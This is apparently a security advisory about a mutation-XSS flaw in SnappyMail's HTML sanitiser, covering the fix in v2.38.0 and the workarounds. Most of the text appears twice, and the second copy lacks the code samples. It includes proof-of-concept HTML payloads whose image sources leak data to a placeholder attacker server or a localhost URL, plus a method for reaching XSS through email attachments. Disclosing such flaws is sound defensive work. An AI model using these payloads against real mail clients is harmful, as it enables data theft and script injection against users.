SnappyMail uses cleanHtml() to cleanup HTML and CSS in emails.
Oskar figured out that the function has a few bugs which cause an mXSS exploit.
Because it allowed too many (invalid) HTML elements, it was possible (with incorrect markup) to trick the browser to "fix" the broken markup into valid markup
For example:
<math><annotation-xml encoding=text/html><xmp><mtext>
<img style="display: none"
src='http://localhost:5000/leak?</mtext></xmp></annotation-xml></math><img src="cid:foo"><xmp>'>
</xmp>
Results in:
<math><annotation-xml encoding=text/html><xmp><mtext>
<img style="display: none"
src='http://localhost:5000/leak?'>
</mtext></xmp></annotation-xml></math>
<img src="cid:foo">
<xmp></xmp>
SnappyMail also cleans up CSS in there.
One of them is an attempt to "fix" Microsoft Outlook/Word emails, as Outlook creates broken HTML like <style><!-- </style>
The attempt was incorrect as it created a different issue:
<style>
foo { <<!--/style>
<iframe style="display: none" src='data:text/html;charset=ISO-2022-JP,
<img src='{attacker_server}/leak?\x1b$@
}
</style>Results in:
<style>
foo { </style>
<iframe style="display: none" src='data:text/html;charset=ISO-2022-JP,
<img src='{attacker_server}/leak?\x1b$@
Impact
Due to the default Content Security Policy the impact of the exploit is minimal, though it can lead to XSS in some cases.
It could be possible to create an attack which leaks some data when loading images through the proxy.
This way it might be possible to use the proxy to attack the local system, like with http://localhost:5000/leak
An other attack could be to load a JavaScript attachment of the email, leading to XSS.
This is very tricky as the email must link to every possible UID as each email has a unique UID which has a value between 1 and 18446744073709551615.
But this range could be reduced by leaking an email UID and sending a second email containing the first email's UID to load the JS attachment. This requires that the second email is opened in the same mailbox where the first email is.
(See video below as example)
Patches
v2.38.0 and up now removes unsupported HTML elements which mitigates the issue
Workarounds
Older versions can install an extension named "Security mXSS".
This will be available at the administration area at /?admin#/packages.
NOTE: this extension can not "fix" malicious code in encrypted messages or (html) attachments as it can't manipulate the JavaScript code for this.
It only protects normal message HTML.
You can also rebuild the JavaScript yourself for full protection:
- get cfbc474
- Implement the changes in your code
- build SnappyMail using
gulp or create full package using php cli/release.php
References
Video: https://github.com/user-attachments/assets/6ca738be-c5ff-4e63-b8d2-b99e04db0a54
mXSS resources:
SnappyMail uses cleanHtml() to cleanup HTML and CSS in emails.
Oskar figured out that the function has a few bugs which cause an mXSS exploit.
Because it allowed too many (invalid) HTML elements, it was possible (with incorrect markup) to trick the browser to "fix" the broken markup into valid markup
For example:
Results in:
SnappyMail also cleans up CSS in there.
One of them is an attempt to "fix" Microsoft Outlook/Word emails, as Outlook creates broken HTML like
<style><!-- </style>The attempt was incorrect as it created a different issue:
Results in:
Impact
Due to the default Content Security Policy the impact of the exploit is minimal, though it can lead to XSS in some cases.
It could be possible to create an attack which leaks some data when loading images through the proxy.
This way it might be possible to use the proxy to attack the local system, like with
http://localhost:5000/leakAn other attack could be to load a JavaScript attachment of the email, leading to XSS.
This is very tricky as the email must link to every possible UID as each email has a unique UID which has a value between 1 and 18446744073709551615.
But this range could be reduced by leaking an email UID and sending a second email containing the first email's UID to load the JS attachment. This requires that the second email is opened in the same mailbox where the first email is.
(See video below as example)
Patches
v2.38.0 and up now removes unsupported HTML elements which mitigates the issue
Workarounds
Older versions can install an extension named "Security mXSS".
This will be available at the administration area at
/?admin#/packages.NOTE: this extension can not "fix" malicious code in encrypted messages or (html) attachments as it can't manipulate the JavaScript code for this.
It only protects normal message HTML.
You can also rebuild the JavaScript yourself for full protection:
gulpor create full package usingphp cli/release.phpReferences
Video: https://github.com/user-attachments/assets/6ca738be-c5ff-4e63-b8d2-b99e04db0a54
mXSS resources: